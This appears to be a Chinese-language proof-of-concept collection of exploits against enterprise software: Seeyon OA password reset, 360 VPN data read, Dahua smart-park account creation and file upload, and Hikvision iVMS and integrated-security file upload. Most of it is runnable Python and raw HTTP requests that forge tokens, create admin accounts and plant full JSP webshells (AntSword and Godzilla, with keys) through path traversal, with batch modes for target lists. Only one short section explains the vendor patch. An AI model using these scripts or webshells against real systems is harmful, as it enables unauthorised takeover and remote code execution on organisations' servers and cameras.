
poc_collection


致远OA任意用户重置

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 49

{"loginName":"18888888888", "password": "123456"}

Patch for the SMS-code-bypass password reset. In the fixed handler (decompiled below) the reset only proceeds when the session already carries `loginName`, `canModify == "true"` and the SMS verification step recorded by `PersonalBindController.isPass(session, 3)`; the account is taken from the session, not from the request body. An SMS gateway is therefore required on patched systems, otherwise users cannot reset their password at all.


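@POST
@Produces({"application/json"})
@Path("phoneCode/resetPassword")
@RestInterfaceAnnotation
public Response resetPassword(Map<String, Object> param) {
    // Vendor-patched handler (per the page, the fix for the SMS-code bypass).
    // The target account comes from the session, which the phone-code flow is
    // expected to have populated with loginName / canModify; only "password"
    // is read from the request body.  No complexity check on that value is
    // visible here.
    //
    // getSession(false) never creates a session.  Without the guard below a
    // request with no session cookie would NPE on getAttribute and surface as
    // a server error rather than the "illegal operation" rejection.
    HttpSession session = this.req.getSession(false);
    if (session == null) {
        return this.fail("非法操作!", 3);
    }
    Object loginName = session.getAttribute("loginName");
    Object canModify = session.getAttribute("canModify");
    // Same checks, same short-circuit order as the original conjunction.
    if (null == loginName || !"true".equals(canModify) || !PersonalBindController.isPass(session, 3)) {
        return this.fail("非法操作!", 3);
    }
    session.removeAttribute("seeyon_find_pwd_count");
    PrincipalManager principalManager = (PrincipalManager) AppContext.getBean("principalManager");
    String password = String.valueOf(param.get("password"));
    try {
        V3xOrgMember member = this.orgManager.getMemberByLoginName((String) loginName);
        if (member == null) {
            return this.fail("Member not exist!", 3);
        }
        // Snapshot before/after copies; the LDAP sync below needs both.
        V3xOrgMember memberBeforeUpdate = new V3xOrgMember();
        V3xOrgMember newMember = new V3xOrgMember();
        BeanUtils.copyProperties(memberBeforeUpdate, member);
        V3xOrgPrincipal newOrgPrincipal = new V3xOrgPrincipal(member.getId(), member.getLoginName(), password);
        member.setV3xOrgPrincipal(newOrgPrincipal);
        BeanUtils.copyProperties(newMember, member);
        OrganizationMessage om = principalManager.update(newOrgPrincipal);
        if (Strings.isNotEmpty(om.getErrorMsgs())) {
            OrgHelper.throwBusinessExceptionTools(om);
        }
        if (LdapUtils.isLdapEnabled() && LdapUtils.isBind(member.getId())) {
            LDAPConfig config = LDAPConfig.getInstance();
            String type = config.getSys().getProperty("ldap.ad.enabled");
            // Parenthesised for clarity; && already binds tighter than || in the
            // original: AD only when SSL is enabled, plain LDAP unconditionally.
            if (("ad".equals(type) && config.getIsEnableSSL()) || "ldap".equals(type)) {
                OrganizationLdapEvent ldapEvent = (OrganizationLdapEvent) AppContext.getBean("organizationLdapEvent");
                ldapEvent.changePassword(memberBeforeUpdate, newMember);
            }
        }
        ChangePwdEvent event = new ChangePwdEvent(this);
        event.setMember(member);
        EventDispatcher.fireEvent(event);
        // One-shot: the session can no longer be replayed for a second reset.
        session.removeAttribute("loginName");
        session.removeAttribute("canModify");
        return this.success(true, "success");
    } catch (Exception e) {
        // Any failure (lookup, update, LDAP sync) is reported uniformly.
        return this.fail(JSONUtil.toJSONString(false), 3);
    }
}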

360vpn用户读取

GET /admin/group/x_group.php?id=2 HTTP/1.1
Host:
Cookie: admin_id=1;gw_admin_ticket=1;

大华智慧园区文件上传

poc1

import requests
import argparse
import hashlib
# zip generation (traversal archive): python evilarc.py test.jsp -p opt/tomcat/webapps/upload/ -d 13 -o unix
# Credentials create_user() submits for the account it registers.
username, pwd = "test", "admin.123"
def calculate_md5(string):
    """Return the lowercase hex MD5 digest of ``string`` (UTF-8 encoded)."""
    return hashlib.md5(string.encode("utf-8")).hexdigest()

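def get_cookie(url):
    """Fetch a session identifier from ``/admin/sso_initSession.action``.

    The response body is returned verbatim; create_user() sends it back as
    the JSESSIONID cookie value.  TLS verification is disabled
    (``verify=False``), presumably for self-signed certificates on targets —
    this also makes the traffic interceptable, so only use it against hosts
    you are authorised to test.
    """
    # The original defined unused local username/pwd copies; dropped.
    endpoint = url + "/admin/sso_initSession.action"
    # A timeout keeps a non-responsive host from hanging the run.
    return requests.get(endpoint, verify=False, timeout=10).text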

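def create_user(url, cookie):
    """POST a hand-built multipart form to ``/admin/user_save.action``.

    Registers an account using the module-level ``username``/``pwd`` with
    ``userBean.roleIds=1``, ``userBean.ownerCode=001`` and
    ``userBean.groupId=0``; ``cookie`` is sent as JSESSIONID.  Returns the
    ``requests`` response so the caller can check the outcome — the original
    printed the credentials unconditionally and discarded the response.
    """
    endpoint = url + "/admin/user_save.action"
    cookies = {"JSESSIONID": cookie}
    # The boundary here must match the one embedded in the body below.
    headers = {"Content-Type": "multipart/form-data; boundary=----cdbnafmv"}
    body = "------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.userType\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.ownerCode\"\r\n\r\n001\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.isReuse\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.macStat\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.roleIds\"\r\n\r\n1\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.loginName\"\r\n\r\n"+username+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"displayedOrgName\"\r\n\r\n"+username+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.loginPass\"\r\n\r\n"+pwd+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"checkPass\"\r\n\r\n"+pwd+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.groupId\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.userName\"\r\n\r\n"+username+"\r\n------cdbnafmv--"
    r = requests.post(endpoint, headers=headers, cookies=cookies, data=body, verify=False, timeout=10)
    print("新建账户密码:"+username+'/'+pwd)
    # Surface the status so a rejected request (e.g. a redirect to the login
    # page) is visible instead of being reported as a created account.
    print("HTTP " + str(r.status_code))
    return r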

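def upload(url, user=None, password=None):
    """Print and return the ``recover_recover.action`` URL for an account.

    The ``password`` query parameter is ``md5(user + ":dss:" + password)``
    in lowercase hex.  ``user``/``password`` default to the module-level
    ``username``/``pwd`` that create_user() registers.

    NOTE(review): the original hard-coded ``admin.1234`` here while
    create_user() submits ``admin.123``; assumed to be a typo and aligned
    with the created account — confirm which value the endpoint expects.
    The unused hard-coded ``token`` local was dropped.  Despite its name the
    function performs no upload: it only derives and prints the URL.
    """
    if user is None:
        user = username
    if password is None:
        password = pwd
    digest = hashlib.md5((user + ":dss:" + password).encode("utf-8")).hexdigest()
    recover_url = url + "/admin/recover_recover.action?password=" + digest
    print(recover_url)
    return recover_url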

def poc(url):
    """Run the account-creation chain against ``url``.

    Obtains a session id, then registers the account.  The recovery-URL step
    (``upload``) stays disabled, exactly as in the original.
    """
    session_id = get_cookie(url)
    create_user(url, session_id)
    # upload(url)  -- intentionally not called

poc2

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

(webshell payload goes here)
--f3aeb22be281d77542546a2f71e20982--

海康ivms8700 文件上传

import requests
import hashlib
import json
import argparse
import urllib.request
# webshell password: test

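def md5(text):
    """Return the uppercase hex MD5 digest of ``text`` (UTF-8 encoded).

    Uppercase is deliberate: make_token() feeds this into the upload token,
    and the server presumably compares it case-sensitively — TODO confirm.
    """
    # The original bound a local also named ``md5``, shadowing this function.
    return hashlib.md5(text.encode('utf-8')).hexdigest().upper()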

def make_token(url):
    """Derive the upload token for ``url`` and print it.

    token = uppercase-hex MD5(url + "/eps/api/resourceOperations/upload" +
    "secretKeyIbuilding").  Every input is static or chosen by the caller,
    which is why anyone can mint a valid token for any host.  ``url`` must be
    exactly what the server hashes on its side — a trailing slash or newline
    changes the digest.
    """
    seed = url + "/eps/api/resourceOperations/upload" + "secretKeyIbuilding"
    token = hashlib.md5(seed.encode('utf-8')).hexdigest().upper()
    print("token=" + token)
    return token

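def poc(url):
    """Upload ``test.jsp`` to ``/eps/api/resourceOperations/upload`` on ``url``.

    The ``token`` query parameter comes from make_token().  The multipart
    body carries a JSP stub that defines a class from the base64 ``test``
    request parameter and instantiates it (the print labels it an AntSword
    shell).  On success the JSON reply's ``data.resourceUuid`` names the
    stored file and the path under ``/eps/upload/`` is printed.

    Returns the webshell URL, or None when the request or the response
    parsing fails — the original swallowed every exception as a bare
    ``'error'`` with no cause.
    """
    endpoint = url + "/eps/api/resourceOperations/upload?token=" + make_token(url)
    # The original dict literal listed JSESSIONID twice; Python keeps only the
    # last value, so that is the one that was actually sent.  It is arbitrary.
    cookies = {"JSESSIONID": "A057E1610B78BFA2886DC12A51AE15DC"}
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------64177297227648318974173496085", "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    body = "-----------------------------64177297227648318974173496085\r\nContent-Disposition: form-data; name=\"fileUploader\"; filename=\"test.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%!\r\nclass BLUB extends ClassLoader{\r\n BLUB(ClassLoader c){super(c);}\r\n public Class clone(byte[] b){\r\n return super.defineClass(b, 0, b.length);\r\n }\r\n}\r\npublic byte[] nondeclarative(String str) throws Exception {\r\n Class base64;\r\n byte[] value = null;\r\n try {\r\n base64=Class.forName(\"sun.misc.BASE64Decoder\");\r\n Object decoder = base64.newInstance();\r\n value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] {String.class }).invoke(decoder, new Object[] { str });\r\n } catch (Exception e) {\r\n try {\r\n base64=Class.forName(\"java.util.Base64\");\r\n Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);\r\n value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { str });\r\n } catch (Exception ee) {}\r\n }\r\n return value;\r\n}\r\n%>\r\n<%\r\nString cls = request.getParameter(\"test\");\r\nif (cls != null) {\r\n new BLUB(this.getClass().getClassLoader()).clone(nondeclarative(cls)).newInstance().equals(new Object[]{request,response});\r\n}\r\n%>\r\n\r\n-----------------------------64177297227648318974173496085--\r\n"
    print("正在上传蚁剑webshell:")
    try:
        r = requests.post(endpoint, headers=headers, cookies=cookies, data=body, timeout=10)
    except requests.RequestException as e:
        print('error', e)
        return None
    try:
        resource_uuid = json.loads(r.text)['data']['resourceUuid']
    except (ValueError, KeyError, TypeError) as e:
        # Not the expected JSON shape: show status and a slice of the body.
        print('error', e, r.status_code, r.text[:200])
        return None
    webshell = url + "/eps/upload/" + str(resource_uuid) + '.jsp'
    print(webshell)
    return webshell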

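if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='ivms-poc')
    parser.add_argument('-u', "--url", metavar='url', type=str, help='URL')
    parser.add_argument('-f', "--file", metavar='file', type=str, help='FILE')
    args = parser.parse_args()
    if args.url:
        print(args.url)
        poc(args.url)
    if args.file:
        # readlines() keeps the trailing newline; the original passed it
        # straight into poc(), corrupting both the request URL and the token
        # digest in make_token().  Strip it and skip blank lines.
        with open(args.file) as fh:
            for line in fh:
                url = line.strip()
                if not url:
                    continue
                print(url)
                poc(url)
                print('--------------------------------')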

海康综合安防文件上传

import requests
import argparse
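def poc(url):
    """POST a traversal-named JSP to ``/center/api/files;.js`` on ``url``.

    The multipart ``file`` part is named
    ``../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/test.jsp``;
    the payload is a Godzilla-style JSP (parameter name ``pass``, AES key
    ``3c6e0b8a9c15224a``, both visible in the literal).  The ``;.js`` suffix
    on the request path is part of the published request; presumably it
    defeats a suffix-based access rule — confirm.  TLS verification is off
    (``verify=False``).  If the traversal lands, the shell would presumably be
    reachable at ``url + "/clusterMgr/test.jsp"`` — not verified here.

    Prints the response body and returns the ``requests`` response.

    The original's body literal had been split across two source lines by the
    page export (unterminated string); it is rejoined here unchanged.
    """
    endpoint = url + "/center/api/files;.js"
    cookies = {"JSESSIONID": "2AD22120C342A16B148D42DDB2B8C457"}
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------12719375598068828622754559132", "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "cross-site", "Sec-Fetch-User": "?1"}
    body = "-----------------------------12719375598068828622754559132\r\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/test.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%! String xc=\"3c6e0b8a9c15224a\"; String pass=\"pass\"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\"MD5\");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName(\"java.util.Base64\");Object Encoder = base64.getMethod(\"getEncoder\", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\"encodeToString\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Encoder\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod(\"encode\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName(\"java.util.Base64\");Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Decoder\"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute(\"payload\")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}\r\n%>\r\n-----------------------------12719375598068828622754559132--\r\n"
    # A timeout keeps a non-responsive host from hanging a batch (-f) run.
    r = requests.post(endpoint, headers=headers, cookies=cookies, data=body, verify=False, timeout=10)
    print(r.text)
    return r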
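if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='海康综合安防文件上传')
    parser.add_argument('-u', "--url", metavar='url', type=str, help='URL')
    parser.add_argument('-f', "--file", metavar='file', type=str, help='FILE')
    args = parser.parse_args()
    if args.url:
        print(args.url)
        poc(args.url)
    if args.file:
        # readlines() keeps the trailing newline; the original passed it
        # straight into poc(), so the request went to "<url>\n/center/...".
        # Strip it and skip blank lines.
        with open(args.file) as fh:
            for line in fh:
                url = line.strip()
                if not url:
                    continue
                print(url)
                poc(url)
                print('--------------------------------')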